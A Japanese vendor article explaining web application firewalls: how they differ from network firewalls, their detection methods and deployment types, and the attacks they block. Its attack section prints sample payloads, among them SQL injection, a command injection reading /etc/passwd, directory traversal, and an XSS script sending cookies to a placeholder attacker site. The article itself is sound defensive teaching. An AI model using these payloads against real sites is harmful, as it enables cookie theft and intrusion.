WAFとは?従来のファイアウォールとの違い
WAF(Web Application Firewall)とは、Webアプリケーション層を保護するためのセキュリティ対策ツールです。従来のファイアウォールでは対応できない、Webアプリケーションに特化した攻撃から企業システムを守ります。
WAFとは
WAFは「Web Application Firewall」の略称で、Webアプリケーションへの攻撃を検知・防御するセキュリティ対策です。Webサイトやアプリケーションに対する悪意ある通信を監視し、不審なリクエストをブロックする役割を担います。
通常、WAFはWebサーバーとインターネットの間に設置され、通信トラフィックを監視します。Webアプリケーションの脆弱性を狙った攻撃パターンを検知し、攻撃を未然に防止する機能が最大の特徴です。これにより、Webアプリケーションの利用における安全性を高め、情報漏洩やシステム障害などのリスクを低減できます。
WAFは一般的に、HTTPおよびHTTPS通信を主な対象に、リクエストヘッダー、URLパラメータ、POSTデータなどを分析して不正なパターンを検出します。攻撃と判断された通信は遮断され、正常な通信のみがWebサーバーに到達する仕組みとなっています。
具体的には、WAFはWebサイトへのアクセス要求(HTTP/HTTPS通信)の中身を詳しく見ます。例えば、お問い合わせフォームに入力された内容や、URLに含まれる情報などを検査します。そこに、データベースを不正に操作しようとする命令(SQLインジェクション)や、利用者のブラウザで悪意のあるプログラムを実行させるスクリプト(クロスサイトスクリプティング)のような、攻撃に使われる特徴的なパターンがないかチェックし、見つけたらブロックします。
従来のファイアウォールとWAFの違い
従来のファイアウォール(FW)とWAFの最大の違いは、保護対象となるネットワーク層にあります。従来のファイアウォールはネットワーク層(OSI参照モデルの第3~4層)を主に保護するのに対し、WAFはアプリケーション層(第7層)を対象としています。
| 対策製品 | 主な保護対象 | 通信制御の単位 | 主な対応攻撃 |
|---|---|---|---|
| 従来のファイアウォール | ネットワーク層 | IPアドレス、ポート番号 | 不正アクセス、ポートスキャンなど |
| WAF | アプリケーション層 | HTTP/HTTPSリクエスト内容 | SQLインジェクション、XSSなどのWebアプリ攻撃 |
表はスライドできます
従来のファイアウォールは「どのIPアドレスからどのポートへの通信を許可/拒否するか」といった制御が主な役割です。一方、WAFは「Webアプリケーションへのリクエスト内容が正常か不正か」を判断し、Webアプリケーションの脆弱性を突いた攻撃を特定して防御することができます。
例えば、ポート80(HTTP)やポート443(HTTPS)への通信は従来のファイアウォールで許可されていても、その中にSQL文が含まれる不正なリクエストはWAFがブロックするという仕組みです。
セキュリティ対策としてのWAFの位置づけ
企業のセキュリティ対策全体において、WAFは「アプリケーションセキュリティ」の重要な一部を担っています。包括的なセキュリティ対策を構築するためには、複数の防御層を組み合わせる「多層防御(Defense in Depth)」の考え方が重要です。
セキュリティ対策における各ツールの位置づけは以下のようになります。
| セキュリティ層 | 主なセキュリティ対策 | 役割 |
|---|---|---|
| ネットワーク層 | ファイアウォール、IDS/IPS | 不正な通信の遮断、侵入検知・防止 |
| ホスト層 | アンチウイルス、EDR | マルウェア対策、エンドポイント保護 |
| アプリケーション層 | WAF、DBファイアウォール | Webアプリの保護、DBへの不正アクセス防止 |
表はスライドできます
WAFは単独で使用するのではなく、他のセキュリティ対策と組み合わせて使用することで、より強固なセキュリティ体制を構築することができます。
特にWebサービスを多く提供している企業にとって、WAFは必須のセキュリティ対策のひとつと言えるでしょう。
WAFの仕組み
WAFがどのように攻撃を検知し、防御するのか、その基本的な仕組みと主な検知方式について解説します。
シグネチャベースの検知
WAFの基本的な検知方式のひとつが「シグネチャベース」の検知です。これは、既知の攻撃パターン(シグネチャ)とWebトラフィックを照合し、一致するものを攻撃として検知する方法です。実際には以下のような検知プロセスとなります。
- WAFがHTTP/HTTPSリクエストを受信
- リクエストの各部分(URI、クエリパラメータ、HTTPヘッダー、POSTデータなど)を解析
- 解析したデータをあらかじめ用意された攻撃パターンデータベースと照合
- マッチングした場合は攻撃と判断し、設定に応じてブロックまたは警告
シグネチャベースの検知は、既知の攻撃に対しては高い精度で検出できる反面、シグネチャが登録されていない新種の攻撃(ゼロデイ攻撃)には対応できないという制限があります。そのため、WAFベンダーは常に新しい攻撃パターンを収集し、シグネチャデータベースを更新しています。
一般的なWAFでは、OWASP(Open Web Application Security Project)が公開している「OWASP Top 10」などの一般的な脆弱性に対応するシグネチャが標準で搭載されています。また、シグネチャの更新は自動または手動で行うことができ、最新の攻撃に対応することが可能です。(引用:中小企業の実態判明 サイバー攻撃の7割は取引先へも影響)
ブラックリスト方式とホワイトリスト方式
WAFの検知方式には大きく分けて「ブラックリスト方式」と「ホワイトリスト方式」の2つのアプローチがあります。
ブラックリスト方式とは、特定の対象を「禁止」または「拒否」する方式です。ブラックリストに載った対象は一切許可されないため、セキュリティの観点から効果的ですが、管理が煩雑になりやすく、新たな脅威に対してはリアルタイムでの対応が求められます。
ホワイトリスト方式とは、逆に「許可する」対象のみをリストに登録し、それ以外のものは全て拒否する方式です。この方式では、不要なアクセスを防ぐ効果が高いですが、信頼できる対象をしっかりと管理する必要があります。
実際のWAF運用では、ブラックリスト方式とホワイトリスト方式を組み合わせて使用することで、セキュリティと利便性のバランスを取ることが一般的です。例えば、基本的な保護にはブラックリスト方式を採用し、特に重要な機能や機密情報を扱う部分にはホワイトリスト方式を適用するといった運用が行われています。
また、最近のWAFでは機械学習やAIを活用した「行動ベース」の検知も導入されています。これは通常のWebサイトの利用パターンを学習し、そこから逸脱する不審な動きを検知する方法です。従来の方式よりも精度が高く、未知の攻撃にも対応できるというメリットがあります。
WAFの設置形態
WAFには大きく分けて3種類の形態があり、それぞれに特徴やメリット・デメリットがあります。企業の規模や運用体制、セキュリティ要件に合わせて最適な形態を選択することが重要です。
クラウド型WAF
クラウド型WAFは、クラウドサービスとして提供されるWAFで、「WAF as a Service」とも呼ばれます。ユーザーはクラウドプロバイダーが提供するWAFサービスを利用する形態です。
- メリット:導入が比較的簡単(専用機器の設置不要)、初期費用が抑えられる場合が多く、シグネチャ更新やスケーラビリティの管理はベンダーが行うため運用負荷が低い。アクセス増減に合わせて柔軟にスケールしやすい。
- デメリット:月額/年額の利用料が発生する、ベンダーに依存するためカスタマイズの自由度が低い場合がある、通信経路によっては遅延が発生する可能性がある。
ソフトウェア型WAF
ソフトウェア型WAFは、Webサーバーやプロキシサーバーにインストールして使用するタイプのWAFです。既存のサーバー環境に組み込む形で利用します。
- メリット:既存のサーバーリソースを活用でき、OSレベルからの設定が可能でカスタマイズ性が高い。ネットワーク構成の変更が少ない場合がある。
- デメリット:導入や設定に専門知識が必要な場合がある。サーバーの性能に影響を与える可能性がある。OSやミドルウェアを含めた管理やアップデート、チューニングを自社で行う必要があり運用負荷が高い。
アプライアンス型WAF
アプライアンス型WAFは、専用のハードウェア機器として提供されるWAFです。物理的な機器を自社のネットワーク内に設置して利用します。
- メリット:高い処理性能や低遅延が期待できる。自社ネットワーク内で完結するため管理しやすい。比較的カスタマイズ性が高い。
- デメリット: 専用機器の購入に初期費用がかかる。設置スペースや電源が必要となる。ハードウェアの保守やソフトウェアのアップデート、チューニングを自社で行う必要があり、運用負荷がかかる。アクセス増に対応するには機器の追加や交換が必要になる場合がある。
| WAFの形態 | メリット | デメリット |
|---|---|---|
| クラウド型WAF | 導入が容易 初期費用を抑えやすい 運用負荷が低い(ベンダー管理) アクセス増減に合わせた柔軟性 |
月額/年額利用料が発生 カスタマイズ性が低い場合あり 通信経路によっては通信遅延の可能性 |
| ソフトウェア型WAF | 既存サーバーの活用が可能 高いカスタマイズ性 ネットワーク構成の変更が少ない場合あり |
導入や設定に専門知識が必要 サーバー性能への影響の可能性 運用負荷が高い(自社管理) |
| アプライアンス型WAF | 高い処理性能・低遅延 管理しやすい(自社ネットワーク内) 比較的高いカスタマイズ性 |
初期費用が高い 設置スペースや電源が必要 運用負荷が高い(自社管理) 拡張に機器の追加や交換が必要な場合あり |
表はスライドできます
WAFで防げる主な攻撃
WAFは様々なWebアプリケーション攻撃から保護する機能を持っています。ここでは、WAFが防御できる代表的な攻撃手法とその仕組みについて解説します。
SQLインジェクションとOSコマンドインジェクション
SQLインジェクションは、Webアプリケーションの入力フィールドにSQL文を挿入し、データベースを不正に操作する攻撃です。この攻撃が成功すると、データベースの情報漏洩や改ざん、さらには認証機能の迂回なども可能になります。
攻撃例
- 通常の入力:username
- 悪意ある入力:’ OR ‘1’=’1
上記の例では「常に真となる条件」を挿入することで、認証をバイパスする可能性があります。WAFはこのような不正なSQL文のパターンを検知し、遮断します。
WAFはSQLインジェクション攻撃の特徴的なパターン(特殊文字や予約語の使用など)を検知し、攻撃と判断した通信をブロックすることで、データベースへの不正アクセスを防ぎます。
OSコマンドインジェクションは、Webアプリケーションの脆弱性を利用して、サーバー上でOSコマンドを不正に実行させる攻撃です。これにより攻撃者は、サーバーのファイルにアクセスしたり、悪意あるプログラムを実行したりすることが可能になります。
攻撃例
- 通常の入力:filename.txt
- 悪意ある入力:filename.txt; cat /etc/passwd
この例では、ファイル名に続けてOSコマンド「cat /etc/passwd」を実行させ、パスワード情報を盗み見ようとしています。
WAFはこのようなコマンド構文や特殊文字のパターンを検知し、サーバーに到達する前にブロックします。また、ディレクトリ・トラバーサル攻撃(例:../../../etc/passwd)も同様に検知・防御します。
クロスサイトスクリプティングとその他の攻撃
クロスサイトスクリプティング(XSS)は、Webサイトの入力フォームや掲示板などに悪意のあるスクリプトを挿入し、そのWebサイトを閲覧したユーザーのブラウザ上でスクリプトを実行させる攻撃です。これにより、ユーザーのクッキー情報の窃取やセッションハイジャックなどが可能になります。
攻撃例
- 通常のコメント:これは良いサービスですね
- 悪意あるコメント:<script>document.location=’http://攻撃者サイト/steal.php?cookie=’+document.cookie;</script>
この例では、コメント欄にスクリプトを埋め込み、閲覧者のCookie情報を攻撃者のサイトに送信させようとしています。
WAFはHTMLタグやJavaScriptコードなどの不審なパターンを検出し、XSS攻撃をブロックすることで、ユーザーの個人情報やセッション情報の漏洩を防止します。
このほかにも、WAFは下記の攻撃を防ぐことができます。
| 攻撃の種類 | 説明 |
|---|---|
| CSRF(Cross-Site Request Forgery) | ユーザーが意図しないリクエストを強制的に発行させる攻撃 |
| DDoS攻撃 | 大量のリクエストでサーバーに負荷をかけ、サービスを停止させる攻撃 |
| セッションハイジャック | セッションIDを盗み、ユーザーになりすます攻撃 |
| バッファオーバーフロー | メモリ領域を超えるデータを送り、プログラムを誤作動させる攻撃 |
| Webスキャン・情報収集 | 脆弱性を探るための自動スキャンツールによる攻撃 |
表はスライドできます
WAFはこれらの攻撃パターンを検知し、異常なリクエストをブロックすることで、Webアプリケーションを様々な攻撃から保護します。また、最新の攻撃トレンドに対応するため、WAFのルールは定期的に更新されることが一般的です。
WAF導入のメリット
企業のセキュリティ対策としてWAFを導入することで得られるメリットについて解説します。WAFは単なる防御ツールではなく、ビジネス継続性確保やコンプライアンス対応の観点からも重要な役割を果たします。
脆弱性対策の強化
WAF導入の最大のメリットは、Webアプリケーションの脆弱性に対する防御層を追加できる点です。以下のような具体的なメリットがあります。
パッチ適用までの一時的保護
Webアプリケーションに脆弱性が発見された場合、修正プログラム(パッチ)の開発・テスト・適用には時間がかかります。WAFはこの「パッチギャップ」と呼ばれる期間中も、一時的な応急処置として脆弱性を狙った攻撃をブロックすることで、時間的猶予を提供します。特に重要なシステムや24時間稼働が求められるサービスにとって、この「仮想パッチ」機能は非常に価値があります。
レガシーシステムの保護
更新やサポートが終了したレガシーシステムは、脆弱性が修正されないリスクを抱えています。WAFを導入することで、こうしたシステムを外部からの攻撃から守り、システム刷新までの移行期間を安全に過ごすことができます。
開発時の脆弱性対策コスト削減
アプリケーション開発時のセキュリティ対策には、コードレビューや脆弱性診断など多くのコストがかかります。WAFを導入することで、アプリケーション自体のセキュリティ対策の一部を肩代わりでき、開発コストの削減につながる場合があります。
開発時のセキュリティ対策の補完
WAFは開発段階で見逃された脆弱性が悪用されるリスクを低減するのに役立ちます。しかし、WAFはあくまで補完的な対策であり、Webアプリケーション自体のセキュリティを確保する根本的な責任は、プログラムを開発する側にある点にも注意が必要です。
コンプライアンス対応の支援
PCI DSS(クレジットカード情報セキュリティ基準)などの各種セキュリティ基準では、Webアプリケーションの保護対策が求められています。WAFはこうした要件に対応するための効果的なソリューションとなり、コンプライアンス達成を支援します。
セキュリティの多層化
セキュリティ対策は単一の防御策に頼るのではなく、複数の防御層を組み合わせる「多層防御」が基本です。WAFはこの多層防御戦略において重要な役割を果たします。
アプリケーション層の防御強化
従来のファイアウォールやIDS/IPSが主にネットワーク層やホスト層を守るのに対し、WAFはアプリケーション層を専門的に防御します。WAFを導入することで、セキュリティの盲点となりがちなアプリケーション層の防御を強化し、総合的なセキュリティレベルを高めることができます。
攻撃の可視化と早期検知
WAFは攻撃の試みをリアルタイムで検知し、ログに記録します。これにより、どのような攻撃がどのタイミングで行われているかを可視化できます。こうした情報は、セキュリティ対策の改善や、より大きな攻撃の予兆を掴むための貴重なデータとなります。
セキュリティインシデント発生時の被害最小化
万が一セキュリティインシデントが発生した場合でも、WAFによる防御と検知機能により、被害を最小限に抑えることができます。また、WAFのログはインシデント調査の重要な証拠となり、迅速な対応と再発防止に役立ちます。
運用コストの最適化
WAFの導入により、セキュリティ監視や対応の一部を自動化できるため、セキュリティ運用の効率化につながります。特にクラウド型WAFでは、ベンダー側が最新の脅威情報を反映してくれるため、自社でのルール更新作業が軽減されます。
まとめ
本記事では、WAF(Web Application Firewall)の基本概念から、従来のファイアウォールとの違い、種類と特徴、防御できる攻撃、導入メリット・デメリットまで幅広く解説しました。
WAFはWebアプリケーション層を専門に防御するセキュリティ対策であり、SQLインジェクションやクロスサイトスクリプティングなど、従来のファイアウォールでは防ぎきれない攻撃に対応できる重要なツールです。クラウド型、ソフトウェア型、アプライアンス型と様々な形態があり、企業の規模や要件に合わせて選択することが可能です。
Webアプリケーションの複雑化・高度化が進み、アプリケーション層を標的とした攻撃が増加する中、WAFの重要性は今後ますます高まると考えられます。自社のリスクやセキュリティ要件を適切に評価した上で、WAF導入を検討してみてはいかがでしょうか。
お役立ち資料をダウンロード
「NURO Bizセキュリティサービスカタログ」のダウンロードをご希望のお客様は、
以下必要事項をご入力ください。
